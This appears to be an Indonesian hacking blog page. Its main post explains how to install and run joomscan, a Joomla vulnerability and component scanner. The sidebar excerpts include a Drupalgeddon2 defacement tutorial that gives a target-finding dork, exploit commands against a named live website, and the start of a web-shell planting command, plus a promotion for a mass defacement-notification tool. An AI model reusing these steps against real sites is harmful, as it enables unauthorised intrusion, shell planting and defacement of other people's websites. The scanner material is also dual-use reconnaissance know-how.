joomscan - Joomla Scanner Vulnerability

Oleh ADMIN -
joomscan - Joomla Scanner Vulnerability




review tools nya :

- Version enumerator
- Vulnerability enumerator (based on version)
- Components enumerator (1209 most popular by default)
- Components vulnerability enumerator (based on version)(+1030 exploit)
- Firewall detector
- Reporting to Text & HTML output
- Finding common log files
- Finding common backup files


cara install :
$ git clone https://github.com/rezasp/joomscan.git
$ cd joomscan
$ perl joomscan.pl


joomscan argument :

$ joomscan.pl [options]

--url | -u <URL>                |   The Joomla URL/domain to scan.
--enumerate-components | -ec    |   Try to enumerate components.

--cookie <String>               |   Set cookie.
--user-agent | -a <user-agent>  |   Use the specified User-Agent.
--random-agent | -r             |   Use a random User-Agent.
--timeout <time-out>            |   set timeout.
--about                         |   About Author
--update                        |   Update to the latest version.
--help | -h                     |   This help screen.
--version                       |   Output the current version and exit.



contoh cara memakai nya :

$ perl joomscan.pl --url www.example.com

atau bisa juga
$ perl joomscan.pl -u www.example.com


cara memakai Enumerate components
$ perl joomscan.pl --url www.example.com --enumerate-components

atau bisa juga
$ perl joomscan.pl -u www.example.com --ec



Joomscan setiap waktu bisa update , jadi kalau kita mau update sekalian ke versi yg paling terbaru bisa memakai command di bawah ini:

$ perl joomscan.pl --update

Thanks to kitploit.com

Komentar

Posting Komentar

Postingan populer dari blog ini

Fenomena Jin Catcher dan Mediumisasi Dalam Ruqiah

Oleh -
Gambar
Sumber Foto : (youtube) Ustad Muhammad Faizar Official OKEZONE.ASIA ,ustad Muhammad Faizar,Menjelaskan banyak yang belum faham antara Ruqiah dan Nyambet. Lebih gawat lagi jika,yang belum faham masalah ini adalah peruqiah aktif yang Hobi Mengunggah Proses peruqiah di medsos sambil Praktek yambet kepada mediatornya. Nyambet atau istilah kerennya adalah "Mediumisasi" alias "Jin Catcher,bisa di sebut sebagai mengundang atau memasukan jin kedalam tubuh mediator untuk di ruqiah dan di tanya-tanya dan di dakwahi. sama seperti acara Televisi dan beberapa konten di youtube yang menyusuri Tempat angker untuk di kuak jejak misterinya dengan memanggil jin agar bisa di wawancarai melalaui tubuh dan Mediatornya. ada beberapa poin Kritik Mengenai Praktek Mediumisasi disebut Teknik Catcher yang tidak sangat Relevan dengan Ruqiah Syariyyah ditinjau dalam 3 sisi : "Bertentangan dengan Prinsip pengobatan Nabawi (Terkhusus di bidang ruqiah dan syari'yyah) -Men...
Baca selengkapnya

DRUPAL GEDDON RCE UPLOAD SHELL

Oleh ADMIN -
Gambar
 DRUPAL RCE UPLOAD SHELL      hai ketemu lagi dengan saya , kali ini saya membagikan tutorial deface menggunakan teknik DRUPAL RCE , tutorial deface ini menggunakan tools di terminal dengan bahasa Ruby . langsung saja tutorial nya ya :) metode ini di gunakan untuk website yang memakai CMS Drupal dork : inurl:"*drupal_ajax" intext:"powered by drupal"     dork kembangin setelah menemukan site drupal tinggal eksekusi pakai tools nya saja buka terminal : $ apt-get install git $ gem install ruby $ git clone https://github.com/dreadlocked/Drupalgeddon2 buka file nya  $ cd Drupalgeddon2 cara pakai nya $ ruby drupalgeddon2.rb <site> contoh live target : $ ruby drupalgeddon2.rb http://boatsmedia.in/ jika berhasil nanti web nya ter connect ke terminal lo   cek dengan perintah $ uname -a jika nanti muncul kernal web maka artinya berhasil tinggal eksekusi deh . kalo mau tanam shell tinggal ketik gini $ echo '<?php eval("?>".file_get_con...
Baca selengkapnya

MASS NOTIFIER DEFACER.ID

Oleh ADMIN -
Gambar
halo halo halo assalamualaikum wr wb         kali ini saya akan share tools mass notifier defacer.id buat kalian yang suka mirror di defacer.id tapi kalo mirror harus dikit-dikit  karena adanya cloudflare nah saya disini akan share tools nya :) description    : mass notifier for defacer.id author           : PakL0nc4t github            : https://github.com/p4kl0nc4t date release  : 22/01/2018 tested on kali linux 2017.3 firefox esr tools nya memakai pip2 ya gan :) cara install buka termux / terminal lalu ketik : apt-get install nodejs pip2 install defid_notifier pip2 install defid_notifier --upgrade         kalau sudah berhasil di install dan di upgrade , sekarang tinggal cara pakai nya . buat file isinya list web nya yang mau di mirror dengan ekstensi .txt nama file terserah dan terserah di taruh di folder bagian mana . c...
Baca selengkapnya